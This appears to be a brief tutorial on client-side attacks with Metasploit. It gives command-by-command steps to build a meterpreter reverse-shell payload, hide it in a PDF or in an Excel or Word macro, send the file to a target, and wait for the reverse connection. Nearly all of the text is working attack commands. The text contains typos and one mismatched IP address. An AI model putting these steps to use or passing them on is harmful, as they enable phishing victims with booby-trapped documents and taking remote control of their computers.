Metaesploit attack Using Evil PDF

Client-side Attack by Using Evil PDF
Step 1: Create your own payload

cd /pentest/exploits/framework3

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.169.1.20 LPORT=443 X > /tmp/payload.exe

Step 2: Create an evil pdf

msf > use windows/fileformat/adobe_pdf_embedded_exe
msf > set PAYLOAD windows/metepreter/reverse_tcp
msf > set EXENAME /tmp/payload.exe
msf > set FILENAME /tmp/BestComputerGuide.pdf
msf > set INFILENAME /tmp/Report.pdf
msf > set OUTPUTPATH /tmp/
msf > exploit

Note:
EXENAME is your payload/shellcode
FILENAME is your evil pdf file
INFILENAME is your original pdf file
OUTPUTPATH is your output directory

Result: /tmp/BestComputerGuide.pdf

Step 3: Send the evil pdf file to your client

Step 4: Wait for the reverse connection from the client

msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.1.20
msf > set LPORT 443
msf > exploit

Metaesploit attack Using MS OFFICE

Client-side Attack by Using Evil MS-Office Apps (Excel or Word)
prepare your metaesploit and backtrack

Step 1: Create your own payload

cd /pentest/exploits/framework3

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.20 LPORT=443 X > /tmp/payload.exe

Step 2: Convert your newly created payload to VBA (Visual Basic for Application) script

cd /pentest/exploits/framework3/tools

./exe2vba.rb /tmp/payload.exe /tmp/payload.vba

Step 3: Copy and Paste the contents of the payload to your evil file

Open your evil file (Excel or Word). Select: Tools > Macro > Visual Basic Editor, paste the contents of your payload.vba, then save the file.
Step 4: Send the evil file to your client

Step 5: Wait for the reverse connection from the client

msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.1.20
msf > set LPORT 443
msf > exploit